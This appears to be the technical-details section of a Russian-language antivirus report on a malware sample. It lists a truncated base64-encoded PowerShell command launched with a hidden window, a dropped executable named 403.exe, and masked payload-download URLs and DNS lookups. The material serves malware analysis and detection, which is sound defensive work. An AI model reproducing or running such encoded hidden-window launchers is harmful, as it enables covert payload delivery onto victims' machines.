Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...
- %HOMEPATH%\403.exe
- http://ta###rma.com/dovij7lgjd/ki_oD/
- http://si####tecplc.com/twitter-api/a_fx/
- http://se###cii.com/dovij7lgjd/d_UA/
- http://vv##88.ru/wp-content/Ds_G/
- http://ea###eti.com/wp-content/o_qO/
- DNS ASK ta###rma.com
- DNS ASK si####tecplc.com
- DNS ASK se###cii.com
- DNS ASK vv##88.ru
- DNS ASK ea###eti.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...' (со скрытым окном)